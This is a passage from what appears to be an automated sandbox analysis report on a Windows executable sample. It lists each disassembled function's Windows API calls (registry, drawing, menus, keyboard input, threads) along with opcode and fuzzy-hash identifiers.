                                                • _wcscpy.LIBCMT ref: 00467641
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcslen.LIBCMT ref: 004677BD
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                Strings
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                • String ID: X
                                                • API String ID: 780548581-3081909835
                                                • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                Similarity
                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                • String ID:
                                                • API String ID: 4082120231-0
                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                Similarity
                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                • String ID:
                                                • API String ID: 2027346449-0
                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetMenu.USER32 ref: 0047A703
                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                • _wcslen.LIBCMT ref: 0047A79E
                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                Similarity
                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                • String ID:
                                                • API String ID: 3257027151-0
                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                Similarity
                                                • API ID: ErrorLastselect
                                                • String ID:
                                                • API String ID: 215497628-0
                                                • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                APIs
                                                • GetParent.USER32(?), ref: 0044443B
                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                APIs
                                                • GetParent.USER32(?), ref: 00444633
                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                APIs
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                • String ID:
                                                • API String ID: 2354583917-0
                                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                APIs
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                • String ID:
                                                • API String ID: 896007046-0
                                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                APIs
                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                • GetFocus.USER32 ref: 00448ACF
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Similarity
                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                • String ID:
                                                • API String ID: 3429747543-0
                                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu$\VH
                                                • API String ID: 3164766367-2432546070
                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                APIs
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Msctls_Progress32
                                                • API String ID: 3850602802-3636473452
                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                Similarity
                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 3985565216-0
                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                APIs
                                                • _malloc.LIBCMT ref: 0041F707
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • _free.LIBCMT ref: 0041F71A
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID: [B
                                                • API String ID: 1020059152-632041663
                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                • __getptd.LIBCMT ref: 00413DBD
                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                • _free.LIBCMT ref: 00413E07
                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 155776804-0
                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                APIs
                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 259663610-0
                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                • String ID:
                                                • API String ID: 3220332590-0
                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                • String ID:
                                                • API String ID: 1612042205-0
                                                • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: >$U$\
                                                • API String ID: 2666721431-237099441
                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$InputSend
                                                • String ID:
                                                • API String ID: 2221674350-0
                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
